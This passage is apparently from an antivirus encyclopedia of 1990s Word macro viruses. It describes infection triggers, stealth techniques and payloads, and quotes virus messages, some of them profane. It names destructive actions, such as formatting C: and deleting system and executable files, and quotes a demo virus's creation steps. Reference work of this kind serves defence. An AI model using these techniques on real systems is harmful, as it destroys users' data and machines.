  19496. [Word_DMV.B (a.k.a. Waverly)]
  19497. Virus name: Word.DMV.B (a.k.a. Waverly)
  19498. Virus Type: Word macro virus
  19499. Number of macros: 1
  19500. Encrypted: No
  19501. Macro names: AutoClose
  19502. Size of macros: 1249 Bytes
  19503. Place of origin: Australia
  19504. Date of origin: 1006
  19505. Payload: Yes
  19506. Seen In-The-Wild: No
  19507. Description:
  19508.  
  19509. DMV.B infects the global template (normal.dot) when an
  19510. infected document is closed.  Further documents become
  19511. infected when they are also closed (AutoClose).
  19512.  
  19513. If the second field is higher than 45 and the month is October
  19514. or later, DMV.B adds the following text at the end of the active
  19515. document:
  19516.  
  19517. " We are citizens of Australia.   "
  19518. " We are youth of Victoria.   "
  19519. " We are victims of Mount Waverley Secondary College.   "
  19520. " We tolerated your discipline.   "
  19521. " We stomached your abuse.   "
  19522. " We bore your unprofessionalism.   "
  19523. " We toed the line to protect the bullshit image of YOUR school.   "
  19524. " We watched our friends be pressured out of your school,   "
  19525. " just so you could keep your fucking pass rate figures up.   "
  19526. " And now the world will see, through the spread of this virus
  19527. " just how TOTALLY FUCKED UP we are!   "
  19528. " Parents: yeah- go ahead send your kids to a school where about half
  19529. " of us use drugs. You won't see those figures in the glossy brochure."
  19530. " This community announcement was proudly sponsored by:   "
  19531. " M.W.S.C. Year 12 Class Of '96. - in YOUR face.   "
  19532.  
  19533.  
  19534.  
  19535. [Word_DMV.C]
  19536. Virus name: Word.DMV.C
  19537. Virus Type: Word macro virus
  19538. Number of macros: 1
  19539. Encrypted: No
  19540. Macro names: AutoClose
  19541. Size of macros: 2990 Bytes
  19542. Place of origin: Unknown
  19543. Date of origin: Unknown
  19544. Destructive: No
  19545. Seen In-The-Wild: No
  19546. Description:
  19547.  
  19548. The difference between this new variant and the original
  19549. DMV.A virus is that some of the virus codes have been
  19550. reformatted and some parts are missing (e-mail address).
  19551.  
  19552. DMV.C infects the global template (normal.dot) when an
  19553. infected document is closed.  Further documents become
  19554. infected when they are also closed.
  19555.  
  19556. The following messages are displayed when the global
  19557. template becomes infected:
  19558.  
  19559. "   Counting global macros   "
  19560. "   Infected NORMAL.DOT with copy of AutoClose macro virus   "
  19561. "   Macro vir. has been spread. Now execute some other code.   "
  19562.  
  19563. When a new document becomes infected (global template is
  19564. already infected), DMV displays the following message:
  19565.  
  19566. "   AutoClose macro vir. is already installed in NORMAL.DOT   "
  19567. "   Saved current document as template.   "
  19568. "   Infected current .doc with copy of AutoClose macro vir.   "
  19569. "   Macro vir. has been spread. Now execute some other code.   "
  19570.  
  19571. The virus code contains the following message at the top of
  19572. the code:
  19573.  
  19574. "   REM This demonstrates an application-specific document virus   "
  19575. "   REM generated by an automatic macro in Microsoft Word for   "
  19576. "   REM Windows 6.0. Code is executed each time a document is closed."
  19577. "   REM This macro is only a demonstration, and does not perform any "
  19578. "   REM destructive actions.   "
  19579.  
  19580. "   REM The purpose of this code is to reveal a significant security "
  19581. "   REM risk in software that supports macro languages with   "
  19582. "   REM auto-loading capabilities.  Current virus detection tools are"
  19583. "   REM not presently capable of detecting this type of virus, and   "
  19584. "   REM most users are blissfully unaware that threats can come from "
  19585. "   REM documents.   "
  19586.  
  19587. "   REM Paste this code in the macro Window of a Word document   "
  19588. "   REM template. Save the macro as AutoClose.  Enter some random   "
  19589. "   REM text in the main word processing window and save the document."
  19590. "   REM Now copy the file, naming the new file VIRUS.DOC.  Open   "
  19591. "   REM VIRUS.DOC in Word.  It will appear as a normal document, but  "
  19592. "   REM when you close the document, the virus will execute.   "
  19593.  
  19594. "   REM Message boxes display progress as the code is executed.   "
  19595. "   REM Code is commented.   "
  19596.  
  19597. "   REM Joel McNamara, December 17, 1994   "
  19598.  
  19599.  
  19600. [Word_Doggie.A]
  19601. Virus name: Word.Doggie.A
  19602. Virus Type: Word macro virus
  19603. Number of macros: 3
  19604. Encrypted: No
  19605. Macro names: AutoOpen, Doggie, FileSaveAs
  19606. Size of macros: 610 Bytes
  19607. Place of origin: USA
  19608. Date of origin: Summer 1996
  19609. Destructive: No
  19610. Common In-The-Wild: No
  19611. Description:
  19612.  
  19613. Doggie infects the global template (normal.dot) when an
  19614. infected document is opened. Further documents become
  19615. infected with the "FileSaveAs" command.
  19616.  
  19617. Doggie is one of the very few non-destructive macro viruses.
  19618. It only infects other files and displays the following message:
  19619.  
  19620.  
  19621. "    Doggie   "
  19622.  
  19623.  
  19624. [Word_Drugs.A:De]
  19625. Virus name: Word.Drugs.A:De
  19626. Virus Type: Word macro virus
  19627. Number of macros: 9
  19628. Encrypted: Yes
  19629. Macro names: AutoOpen, Dateidrucken, DateidruckenStandard,
  19630.              DateiSpeichern, DateiSpeichernUnter, DateiSchliessen,
  19631.              DokumentSchliessen, DateiDokVorlagen, ExtrasMakro
  19632. Size of macros: 8013 Bytes
  19633. Place of origin: Germany
  19634. Date of origin: March 1997
  19635. Destructive: Yes
  19636. Seen In-The-Wild: No
  19637. Description:
  19638.  
  19639. Drugs infects the global template when an infected document is
  19640. opened (AutoOpen).
  19641.  
  19642. Drugs uses language specific commands, therefore it only
  19643. works with the German version of Microsoft Word.
  19644. It uses "ExtrasMakro" and hides DokumentVorlagen to make
  19645. recognition of an infected document more difficult (called
  19646. macro stealth technique).
  19647.  
  19648. Drugs contains several destructive payloads.
  19649.  
  19650. 1. It deletes all *.DLL files in the following directory:
  19651.    C:\WINDOWS\SYSTEM
  19652. 2. It replaces words in documents that are printed:
  19653.    "und" replaced  with "oder"
  19654.    "da▀" with "das"
  19655.    "nΣmlich" with "nΣhmlich"
  19656. 3. It inserts page breaks.
  19657.  
  19658.  
  19659.  
  19660. [Word_Dub.A]
  19661. Virus name: Word.Dub.A
  19662. Virus Type: Word macro virus
  19663. Number of macros: 13
  19664. Encrypted: Yes
  19665. Macro names: AutoExec, NewDocInsert, ToolsMacro, FileTemplates
  19666.              FileSaveAs, FcDub, AeDub, Annhilator, Message
  19667.              SearchDestroyer, ExeKiller, KillIt (FileClose)
  19668. Size of macros: 22669 Bytes in Documents
  19669.                 25325 Bytes in global template
  19670. Place of origin: Baku, Azerbaijan
  19671. Date of origin: Spring 1997
  19672. Destructive: Yes
  19673. Seen In-The-Wild: No
  19674. Description:
  19675.  
  19676. When Dub becomes active, it searches the C:\ drive for
  19677. documents (C:\*.DOC). It infects all documents that have the
  19678. Word 6/7 format.
  19679.  
  19680. After each infection, Dub writes a log file where it mentions
  19681. all the killed documents (existing text is replaced with "666").
  19682.  
  19683. Dub.A uses "ToolsMacro" and "FileTemplates" to make
  19684. recognition of an infected document more difficult (called
  19685. macro stealth technique). We advise not to access the two
  19686. menu items, because it will result in the execution of Dubs
  19687. viral code.
  19688.  
  19689. Dub contains various payloads:
  19690.  
  19691. 1. When an infected document is saved (FileSaveAs) at 4:00
  19692.     o'clock, Dub displays the following message:
  19693.  
  19694.     "   Do you believe in Satan?   "
  19695.  
  19696. 2. When Microsoft Word is started (AutoExec) on the 13th of
  19697.    each month, Dub tries to delete the following files:
  19698.    *.EXE.
  19699.  
  19700. 3. Upon infection, all existing text is replaced with " 666 ".
  19701.  
  19702.  
  19703. [Word_Dzt.A]
  19704. Virus name: Word.Dzt.A
  19705. Virus Type: Word macro virus
  19706. Number of macros: 2
  19707. Encrypted: Yes
  19708. Macro names: AutoOpen (FileSave), FileSaveAs
  19709. Size of macros: 2033 Bytes
  19710. Place of origin: Indonesia
  19711. Date of origin: April 1996
  19712. Destructive: No
  19713. Common In-The-Wild: Yes
  19714. Description:
  19715.  
  19716. Dzt.A activates when an infected document is opened
  19717. (AutoOpen).  Further documents become infected when they
  19718. are saved with the "FileSave" and "FileSaveAs" commands.
  19719.  
  19720. When infecting a document, Dzt.A adds the following text to
  19721. the Comments section of File|Properties:
  19722.  
  19723. "   DZT   "
  19724.  
  19725.  
  19726. [Word_Dzt.B]
  19727. Virus name: Word.Dzt.B
  19728. Virus Type: Word macro virus
  19729. Number of macros: 1
  19730. Encrypted: Yes
  19731. Macro names: AutoOpen (FileSave)
  19732. Size of macros: 1214 Bytes
  19733. Place of origin: Indonesia
  19734. Date of origin: April 1996
  19735. Destructive: No
  19736. Common In-The-Wild: Yes
  19737. Description:
  19738.  
  19739. Dzt.B activates when an infected document is opened
  19740. (AutoOpen).  Further documents become infected when they
  19741. are saved with the "FileSave" command.
  19742.  
  19743. The main difference between this new variant and the original
  19744. Dzt.A virus is that the "FileSaveAs" macro is missing.
  19745.  
  19746.  
  19747. [Word_Dzt.C]
  19748. Virus name: Word.Dzt.C
  19749. Virus Type: Word macro virus
  19750. Number of macros: 1
  19751. Encrypted: Yes
  19752. Macro names: FileSaveAs
  19753. Size of macros: 819 Bytes
  19754. Place of origin: Indonesia
  19755. Date of origin: April 1996
  19756. Destructive: No
  19757. Common In-The-Wild: Yes
  19758. Description:
  19759.  
  19760. The main difference between this new variant and the original
  19761. Dzt.A virus is that the "AutoOpen" macro is missing.
  19762.  
  19763. Dzt.C was most likely created by an older version of a popular
  19764. anti-virus product. The disinfection routine was faulty and
  19765. forgot to remove the "AutoOpen" macro.
  19766.  
  19767.  
  19768. [Word_Dzt.D]
  19769. Virus name: Word.Dzt.D
  19770. Virus Type: Word macro virus
  19771. Number of macros: 2
  19772. Encrypted: Yes
  19773. Macro names: AutoOpen (FileSave), FileSaveAs
  19774. Size of macros: 2584 Bytes
  19775. Place of origin: Indonesia
  19776. Date of origin: April 1996
  19777. Destructive: No
  19778. Common In-The-Wild: No
  19779. Description:
  19780.  
  19781. The main difference between this new variant and the original
  19782. Dzt.A virus is that the comment in the File|Properties
  19783. section was changed from "DZT" to "DZT'96."
  19784.  
  19785. The "FileSaveAs" macro is also partially corrupted.
  19786.  
  19787. For more information, please refer to the Dzt.A virus description.
  19788.  
  19789.  
  19790. [Word_Easy.A (a.k.a. EasyMan)]
  19791. Virus name: Word.Easy.A (a.k.a. EasyMan)
  19792. Virus Type: Word macro virus
  19793. Number of macros: 1
  19794. Encrypted: Yes
  19795. Macro names: AutoOpen
  19796. Size of macros: 1090 Bytes
  19797. Place of origin: Austria
  19798. Date of origin: September 1996
  19799. Destructive: Yes
  19800. Common In-The-Wild: No
  19801. Description:
  19802.  
  19803. Easy activates when an infected document is opened
  19804. (AutoOpen). If the "AutoOpen" macro already exists in the
  19805. global template, Easy does not infect.
  19806.  
  19807. The following text will be inserted at the top of an opened
  19808. document at a random date and with a random color:
  19809.  
  19810. "   It's Easy Man   "
  19811.  
  19812. After that Easy displays the following text at the status bar:
  19813.  
  19814. "   Word.EasyMan, written by Spooky   "
  19815.  
  19816.  
  19817. [Word_Epidemic.A]
  19818. Virus name: Word.Epidemic.A
  19819. Virus Type: Word macro virus
  19820. Number of macros: 2
  19821. Encrypted: Yes
  19822. Macro names: AutoOpen, AutoExec
  19823. Size of macros: 38746 Bytes
  19824. Place of origin: Taiwan
  19825. Date of origin: January 1997
  19826. Destructive: Yes
  19827. Common In-The-Wild: No
  19828. Description:
  19829.  
  19830. When an infected document is opened, Epidemic infects the
  19831. global template (normal.dot). Further documents become
  19832. infected when they are opened (AutoOpen) or Microsoft Word is
  19833. started (AutoExec).
  19834.  
  19835. Epidemic has various destructive payloads:
  19836.  
  19837. 1. On April 27, Epidemic formats the hard disk (similar to FormatC).
  19838. 2. On June 17, it uses DEBUG.EXE to drop the Dos-based virus
  19839.    "Natas" into the C:\MOUSE.COM file. It also modifies
  19840.    C:\AUTOEXEC.BAT to call C:\MOUSE.COM upon the next boot-up.
  19841. 3. On October 10, it deletes the following files:
  19842.    "   C:\IO.SYS   "
  19843.    "   C:\MSDOS.SYS   "
  19844.    "   C:\COMMAND.COM   "
  19845.  
  19846.    This action will leave the computer unbootable.
  19847.  
  19848. It then displays the following message:
  19849.  
  19850. "   EPIDEMIC  Macro  Virus  V1.1   "
  19851.  
  19852. Epidemic only works with the Chinese version of Microsoft Word.
  19853.  
  19854.  
  19855. [Word_Trojan.FormatC (a.k.a. TrojanFormat)]
  19856. Virus name: Word.Trojan.FormatC (a.k.a. TrojanFormat)
  19857. Virus Type: Word macro virus
  19858. Number of macros: 1
  19859. Encrypted: No
  19860. Macro names: AutoOpen
  19861. Size of macros: 81 Bytes
  19862. Place of origin: Posted to Usenet
  19863. Date of origin: Unknown
  19864. Destructive: Yes
  19865. Common In-The-Wild: No
  19866. Description:
  19867.  
  19868. FormatC is not a virus but a trojan horse, which does not
  19869. replicate.
  19870.  
  19871. When an infected document is opened, the trojan triggers the
  19872. destructive payload, which types " Format C: /U " in a minimized
  19873. DOS box and then formats the C drive.
  19874.  
  19875. FormatC is very unlikely to spread since it does not infect
  19876. other files.
  19877.  
  19878.  
  19879. [Word_Friendly.A:De]
  19880. Virus name: Word.Friendly.A:De
  19881. Virus Type: Word macro virus
  19882. Number of macros: 20
  19883. Encrypted: No
  19884. Macro names: Abbrechen, AutoExec, AutoOpen, Cancel,
  19885.              DateiBeenden, DateiNeu, DateiOeffnen,
  19886.              DateiSchliessen, DateiSpeichern,
  19887.              DateiSpeichernUnter, ExtrasMacro,
  19888.              ExtrasMakro, Fast, FileExit, FileNew, FileOpen,
  19889.              FileSave, FileSaveAs, Infizieren, Talk
  19890. Size of macros: 9867 Bytes
  19891. Place of origin: Germany
  19892. Date of origin: May 1996
  19893. Destructive: Yes
  19894. Common In-The-Wild: No
  19895. Description:
  19896.  
  19897. Friendly was an effort to write a virus for more than one
  19898. language, yet due to some wrong translations (ExtrasMacro
  19899. instead of ToolsMacro) Friendly does not work with other
  19900. versions than the German version of Microsoft Word.
  19901.  
  19902. Friendly tries to infect the global template (normal.dot) when
  19903. an infected document is opened. It checks the global template
  19904. for a previous infection by looking for the text "Friendly",
  19905. Author = Nightmare". After the macros have been transferred the
  19906. destructive payload is called from the "Fast" macro.
  19907.  
  19908. Friendly infects other documents whenever new ones are created,
  19909. an action is canceled, and whenever documents are opened,
  19910. closed, saved, or exited from Word. Friendly does not check
  19911. for a previous document infection. It simply overwrites existing
  19912. macros.
  19913.  
  19914. The destructive payload, inside the "Fast" macro, is called
  19915. when the system clock has a second value smaller than 2.
  19916. Friendly then creates a debug script inside the C:\DOS
  19917. directory and executes the DOS DEBUG.EXE command. In
  19918. addition, Friendly adds an entry into AUTOEXEC.BAT, so the
  19919. DOS based virus is started after the next boot-up. The DOS
  19920. based virus inside Friendly has a size of 395 Bytes and is a
  19921. memory resident companion virus encrypted with CryptCOM.
  19922.  
  19923. Friendly displays the following message on January 1:
  19924.  
  19925. "   Ein gutes neues Jahr !   "
  19926.  
  19927. and infects EXE files upon execution. COM files are created
  19928. with the same name as EXE files and with the attributes "READ-ONLY"
  19929. and "HIDDEN."
  19930.  
  19931. If the virus is active, the following text is displayed when users
  19932. try to display the macro list:
  19933.  
  19934. "You can't do that!"
  19935. "I'm very anxious!"
  19936. "Hello my friend!"
  19937. "<< Friends >> Virus"
  19938.  
  19939. (translated:)
  19940.  
  19941. "Du kannst das nicht tun!"
  19942. "Ich bin sehr aengstlich!"
  19943. "Hallo mein Freund!"
  19944. "<< Friends >> Virus"
  19945.  
  19946. After May 1, Friendly displays the following text when
  19947. infecting documents for the first time (except for NORMAL.DOT).
  19948.  
  19949. "Hallo mein Freund!"
  19950. "Ich bin der << Friends >> Virus und wie heißt du?"
  19951. "Gib doch bitte anschließend unten deinen Namen ein:"
  19952. "Also ..... ich habe eine gute und eine schlechte Nachricht fuer
  19953. dich!"
  19954. "Die schlechte Nachricht ist, daß ich mich auf deiner Platte
  19955. eingenistet"
  19956. "habe und die gute ist, daß ich aber ein freundlicher und auch
  19957. nuetzlicher"
  19958. "Virus bin. Druecke bitte OK fuer Weiter!"
  19959. "Wenn du mich nicht killst, dann fuege ich ein Programm in deine"
  19960. "Autoexec.bat ein, daß deine lame Tastatur etwas auf Touren bringt."
  19961. "Also ...., gib dir einen Ruck und kill mich nicht. Goodbye!"
  19962.  
  19963. (translated:)
  19964.  
  19965. "Hello my Friend!"
  19966. "I'm the << Friends >> Virus and how are you?"
  19967. "Can you give me your name, please?"
  19968. "Hello .... I have a good and a bad message for you! The bad message is
  19969. that"
  19970. "you have now a Virus on your Harddisk and the good message is that
  19971. I'm"
  19972. "harmless and useful. Press OK!"
  19973.  
  19974. "If you don't kill me, I will insert a programme in your AutoExec.bat
  19975. thats"
  19976. "your Keyboard accelerated. Please .... don't kill me. Goodbye!"
  19977.  
  19978. The entered name will then be displayed.
  19979.  
  19980.  
  19981. [Word_Fury.A (a.k.a. Greenfury)]
  19982. Virus name: Word.Fury.A (a.k.a. Greenfury)
  19983. Virus Type: Word macro virus
  19984. Number of macros: 4
  19985. Encrypted: Yes
  19986. Macro names:  GreenFury, GGGFFF (FileSalvaConNome), FFFGGG, AutoOpen
  19987. Size of macros:  2322
  19988. Place of origin: Unknown
  19989. Date of origin: Unknown
  19990. Destructive: Yes
  19991. Seen In-The-Wild: No
  19992. Description:
  19993.  
  19994. Fury is another virus that only works with the Italian version of
  19995. Microsoft Word.
  19996.  
  19997. Fury infects the global template (normal.dot) when an infected
  19998. document is opened. Further documents become infected when
  19999. they are saved with the "FileSalvaConNome --> translated:
  20000. FileSaveAs" command.
  20001.  
  20002. When Fury is loaded from a non-Italian Word version, it deletes
  20003. all files in the current directory.
  20004.  
  20005. Fury also sets a random password to the active document.
  20006.  
  20007.  
  20008. [Word_FutureNot.A (a.k.a. Anti-IVX, Future)]
  20009. Virus name: Word.FutureNot.A (a.k.a. Anti-IVX, Future)
  20010. Virus Type: Word macro virus
  20011. Number of macros: 1 or 2 (in global template)
  20012. Encrypted: No
  20013. Macro names: AutoOpen (FileSaveAs)
  20014. Size of macros: Polymorphic
  20015. Place of origin: Unknown
  20016. Date of origin: 1997
  20017. Destructive: No
  20018. Common In-The-Wild: No
  20019. Description:
  20020.  
  20021. FutureNot is the first polymorphic macro virus.
  20022.  
  20023. When an infected document is opened, FutureNot infects the
  20024. global template. It creates two macros in the global template.
  20025. One is always "FileSaveAs" and the second one is a copy of
  20026. "AutoOpen" with a randomly chosen name.
  20027.  
  20028. While the second macro remains the same, the FileSaveAs
  20029. macro changes due to randomly selected comments.
  20030.  
  20031. FutureNot also modifies the C:\AUTOEXEC.BAT file. It adds
  20032. the following comment at the end of the file:
  20033.  
  20034. "    @ATTRIB -R C:\MSOFFICE\WINWORD\TEMPLATE\NORMAL.DOT > NUL   "
  20035.  
  20036. This clears the Read-Only attribute from the global template.
  20037.  
  20038.  
  20039. [Word_Gangsterz.A (a.k.a Big Daddy Cool, Daddy)]
  20040. Virus name: Word.Gangsterz.A (a.k.a Big Daddy Cool, Daddy)
  20041. Virus Type: Word macro virus
  20042. Number of macros: 2
  20043. Encrypted: Yes
  20044. Macro names: Gangsterz, Paradise
  20045. Size of macros: 4250 Bytes
  20046. Place of origin: Germany
  20047. Date of origin: Unknown
  20048. Payload: Yes
  20049. Seen In-The-Wild: No
  20050. Description:
  20051.  
  20052. Gangsterz uses a new triggering mechanism. Instead of using
  20053. automatic macros (AutoOpen, etc.) or redefining built-in Word
  20054. commands, it uses assigned keys to start up its macros.
  20055.  
  20056. The "Gangsterz" macro is associated with pressing space and
  20057. the "Paradise" macro with pressing "e." If a user presses any of
  20058. the two keys while working on an infected document, the
  20059. associated macros are activated.
  20060.  
  20061. If a document is infected on January 1, a new document is
  20062. created with the following text:
  20063.  
  20064. "   Big_Daddy_Cool virus generated by NJ   "
  20065.  
  20066. and then filled with scrolling O's.
  20067.  
  20068. If the value of the XOP setting in the [intl] section of win.ini is
  20069. not set to "Installed", Gangsterz drops an intended batch file
  20070. (XOP.bat) virus after activation. It adds a line to the C:\AUTOEXEC.BAT
  20071. file to start the virus.
  20072.  
  20073.  
  20074. [Word_Goldfish.A (a.k.a Fishfood)]
  20075. Virus name: Word.Goldfish.A (a.k.a Fishfood)
  20076. Virus Type: Word macro virus
  20077. Number of macros: 2
  20078. Encrypted: Yes
  20079. Macro names: AutoOpen, AutoClose
  20080. Size of macros: 9867 Bytes
  20081. Place of origin: USA
  20082. Date of origin: July 1996
  20083. Destructive: No
  20084. Common In-The-Wild: No
  20085. Description:
  20086.  
  20087. Goldfish infects the global template (normal.dot) when an
  20088. infected document is opened. Further documents become
  20089. infected when they are also opened ("AutoOpen").
  20090. Goldfish is one of the very few non-destructive macro viruses. It
  20091. only infects other files and displays the following message:
  20092.  
  20093. "   I am the goldfish, I am hungry, feed me.  "
  20094.  
  20095. The message will not go away until the user types in an
  20096. acceptable response. Available answers are:
  20097.  
  20098. "fishfood"
  20099. "worms"
  20100. "worm"
  20101. "pryme"
  20102. "core"
  20103.  
  20104.  
  20105. [Word_GoodNight.A]
  20106. Virus name: Word.GoodNight.A
  20107. Virus Type: Word macro virus
  20108. Number of macros: 10
  20109. Encrypted: No
  20110. Macro names: Exit, AutoExec, AutoExit, AutoOpen,
  20111.              FileOpen, FileSave, AutoClose, FileClose
  20112.              FileSaveAs, FileCloseAll
  20113. Size of macros: 4992 Bytes
  20114. Place of origin: Unknown
  20115. Date of origin: Spring 1997
  20116. Payload: Yes
  20117. Seen In-The-Wild: Yes
  20118. Description:
  20119.  
  20120. GoodNight.A infects the global template (normal.dot) when an
  20121. infected document is opened. Further documents become
  20122. infected when they are closed (AutoClose, FileClose, AutoExit,
  20123. and FileCloseAll) or saved (FileSave and FileSaveAs).
  20124.  
  20125. When GoodNight triggers, it tries to exit Microsoft Word.
  20126.  
  20127. GoodNight.A devolves into GoodNight.A1 (9 macros with 4431
  20128. Bytes) and then into GoodNight.A2 (6 macros with 2763 Bytes).
  20129. GoodNight.A2 is not capable of spreading any further, it does
  20130. not infect any other documents.
  20131.  
  20132.  
  20133. [Word_Haggis.A]
  20134. Virus name: Word.Haggis.A
  20135. Virus Type: Word macro virus
  20136. Number of macros: 1
  20137. Encrypted: Yes
  20138. Macro names: AutoOpen
  20139. Size of macros: 300 Bytes
  20140. Place of origin: Unknown
  20141. Date of origin: Spring 1997
  20142. Payload: Yes
  20143. Seen In-The-Wild: No
  20144. Description:
  20145.  
  20146. Haggis infects the global template when an infected document is
  20147. opened. Further documents become infected when they are also
  20148. opened (AutoOpen).
  20149.  
  20150. Haggis removes "ToolsMacro" to make recognition of an
  20151. infected document more difficult (called macro stealth
  20152. technique).
  20153.  
  20154. When Haggis triggers, it sets the password "   Haggis   " to
  20155. the active document.
  20156.  
  20157. If you find a document with an unknown password, please
  20158. download a copy of WinWord Password Recovery Tool
  20159. (wwprt). It is available at: www.vdsarg.com.
  20160.  
  20161.  
  20162. [Word_Hassle.a (a.k.a Bogus)]
  20163. Virus name: Word.Hassle.a (a.k.a Bogus)
  20164. Virus Type: Word macro virus
  20165. Number of macros: 7
  20166. Encrypted: Yes
  20167. Macro names: AutoClose, Toolsmacro, Microsoft01, Microsoft02,
  20168.              Microsoft03, Microsoft04, Microsoft05
  20169. Size of macros: 8283 Bytes
  20170. Place of origin: USA
  20171. Date of origin: August 1996
  20172. Destructive: No
  20173. Common In-The-Wild: No
  20174. Description:
  20175.  
  20176. Hassle is another virus that uses the macro "ToolsMacro" to
  20177. make recognition of an infected document more difficult
  20178. (called macro stealth technique).
  20179.  
  20180. If the user selects any command, it will show the following
  20181. message and close Microsoft Word:
  20182.  
  20183. "   Out of Memory or System Resources   "
  20184.  
  20185. Hassle is one of the very few non-destructive macro viruses. It
  20186. only infects other files and displays the following text window:
  20187.  
  20188. "   Are you sure to Quit?   "
  20189.  
  20190. This only happens seldomly, with a 5% probability.
  20191.  
  20192. Another payload asks the user to register a software with Microsoft.
  20193. Hassle will only accept:
  20194.  
  20195. "Bill Gates", "Microsoft" and "666"
  20196.  
  20197. Whenever the user selects the Tools/Macro command, Hassle
  20198. will display the following text at the bottom of the screen:
  20199.  
  20200. "   Microsoft Word Assistant Version 6.2   "
  20201.  
  20202.  
  20203. [Word_Hellga.A (a.k.a DNZ, Hellgate)]
  20204. Virus name: Word.Hellga.A (a.k.a DNZ, Hellgate)
  20205. Virus Type: Word macro virus
  20206. Number of macros: 10
  20207. Encrypted: Yes
  20208. Macro names: AutoClose, DnZ, EditCut, EditCopy, FileNew,
  20209.              FileExit, FileTemplates, ToolsSpelling, ToolsMacro,
  20210.              ToolsCustomize
  20211. Size of macros: 2498 Bytes
  20212. Place of origin: Unknown
  20213. Date of origin: Unknown
  20214. Payload: Yes
  20215. Seen In-The-Wild: No
  20216. Description:
  20217.  
  20218. Hellga infects whenever the "DnZ" macro is called from one of
  20219. the virus macros. It then infects the global template (normal.dot)
  20220. and further documents. Hellga also adds the setting "Program=
  20221. Installed" to the [Demo] section of win.ini (Windows directory).
  20222.  
  20223. The following message is displayed on March 9 of each year:
  20224.  
  20225. "   WM.DnZ   "
  20226. "   Written by Bill_HellGateS   "
  20227.  
  20228.  
  20229. [Word_Helper.A]
  20230. Virus name: Word.Helper.A
  20231. Virus Type: Word macro virus
  20232. Number of macros: 1
  20233. Encrypted: Yes
  20234. Macro names: AutoClose
  20235. Size of macros: 409 Bytes
  20236. Place of origin: Unknown
  20237. Date of origin: Unknown
  20238. Payload: Yes
  20239. Seen In-The-Wild: Yes
  20240. Description:
  20241.  
  20242. Helper infects the global template (normal.dot) when an infected
  20243. document is closed. Further documents become infected when
  20244. they are also closed.
  20245.  
  20246. When a document is closed on the 10th of each month, Helper
  20247. triggers its destructive payload. It sets the following password
  20248. to the saved document:
  20249.  
  20250. "   help   "
  20251.  
  20252.  
  20253. [Word_Helper.B]
  20254. Virus name: Word.Helper.B
  20255. Virus Type: Word macro virus
  20256. Number of macros: 1
  20257. Encrypted: Yes
  20258. Macro names: AutoClose
  20259. Size of macros: 409 Bytes
  20260. Place of origin: Unknown
  20261. Date of origin: 1997
  20262. Payload: No
  20263. Seen In-The-Wild: Yes
  20264. Description:
  20265.  
  20266. Helper.B infects the global template (normal.dot) when an
  20267. infected document is closed. Further documents become
  20268. infected when they are also closed.
  20269.  
  20270. The main difference between this new variant and the original
  20271. Helper.A virus is that the payload routine has been modified.
  20272. Due to a mistake, Helper.B does not save any documents with
  20273. the "help" password.
  20274.  
  20275.  
  20276. [Word_Helper.C]
  20277. Virus name: Word.Helper.C
  20278. Virus Type: Word macro virus
  20279. Number of macros: 1
  20280. Encrypted: Yes
  20281. Macro names: AutoClose
  20282. Size of macros: 410 Bytes
  20283. Place of origin: Europe
  20284. Date of origin: April 1997
  20285. Payload: No
  20286. Seen In-The-Wild: No
  20287. Description:
  20288.  
  20289. Helper.C infects the global template (normal.dot) when an
  20290. infected document is closed. Further documents become
  20291. infected when they are also closed.
  20292.  
  20293. The main difference between this new variant and the original
  20294. Helper virus is that someone tried to change the trigger date
  20295. and the password.
  20296.  
  20297. Helper.C does not trigger its payload since one important
  20298. change in its code is missing.
  20299.  
  20300.  
  20301. [Word_Helper.D]
  20302. Virus name: Word.Helper.D
  20303. Virus Type: Word macro virus
  20304. Number of macros: 1
  20305. Encrypted: Yes
  20306. Macro names: AutoClose
  20307. Size of macros: 412 Bytes
  20308. Place of origin: Europe
  20309. Date of origin: April 1997
  20310. Payload: No
  20311. Seen In-The-Wild: No
  20312. Description:
  20313.  
  20314. Helper.D infects the global template (normal.dot) when an
  20315. infected document is closed. Further documents become
  20316. infected when they are also closed.
  20317.  
  20318. The main difference between this new variant and the original
  20319. Helper virus is that someone tried to change the trigger date
  20320. and the password.
  20321.  
  20322. Helper.D does not trigger its payload since one important
  20323. change in its code is missing.
  20324.  
  20325.  
  20326. [Word_Helper.E]
  20327. Virus name: Word.Helper.E
  20328. Virus Type: Word macro virus
  20329. Number of macros: 1
  20330. Encrypted: Yes
  20331. Macro names: AutoClose
  20332. Size of macros: 416 Bytes
  20333. Place of origin: Europe
  20334. Date of origin: April 1997
  20335. Payload: No
  20336. Seen In-The-Wild: No
  20337. Description:
  20338.  
  20339. Helper.E infects the global template (normal.dot) when an
  20340. infected document is closed. Further documents become
  20341. infected when they are also closed.
  20342.  
  20343. The main difference between this new variant and the original
  20344. Helper virus is that someone tried to change the trigger date
  20345. and the password.
  20346.  
  20347. Helper.E does not trigger its payload since one important
  20348. change in its code is missing.
  20349.  
  20350.  
  20351. [Word_Hiac.A]
  20352. Virus name: Word.Hiac.A
  20353. Virus Type: Word macro virus
  20354. Number of macros: 2
  20355. Encrypted: Yes
  20356. Macro names: AutoClose, HI (AC)
  20357. Size of macros: 576 Bytes
  20358. Place of origin: Australia
  20359. Date of origin: Spring 1997
  20360. Destructive: No
  20361. Common In-The-Wild: Yes
  20362. Description:
  20363.  
  20364. Hiac.A is another "do nothing" virus that does nothing
  20365. else besides infecting other files. Infection occurs
  20366. when a user closes a document (AutoClose).
  20367.  
  20368. Its code is faulty and the template bit of infected documents
  20369. is not set, therefore it is unlikely to spread its
  20370. code to other files.
  20371.  
  20372.  
  20373. [Word_Hot.A]
  20374. Virus name: Word.Hot.A
  20375. Virus Type: Word macro virus
  20376. Number of macros: 4
  20377. Encrypted: Yes
  20378. Macro names: AutoOpen, DrawBringInFrOut, InsertPBreak,
  20379.              ToolsRepaginat, FileSaveAs, StartOfDoc
  20380. Size of macros: 5515 Bytes
  20381. Place of origin: Unknown
  20382. Date of origin: January 1996
  20383. Destructive: Yes
  20384. Common In-The-Wild: Yes
  20385. Description:
  20386.  
  20387. When an infected document is opened the virus is activated by
  20388. the AutoOpen macro. Some replicated Hot samples also display
  20389. the following error message:
  20390.  
  20391. "   Unable to load the specified library   "
  20392.  
  20393. Hot turns off the prompting of Word to ensure a hidden
  20394. infection of the global template (normal.dot). It also checks
  20395. the file "WINWORD6.INI" for the following entry: "QLHot".
  20396. If not present, Hot records a "hot date", 14 days in the future.
  20397. If this variable is not already set, the global template becomes
  20398. infected.
  20399.  
  20400. The InsertPBreak/InsertPageBreak inserts a page-break into the
  20401. current document. However, it is also used by the virus to
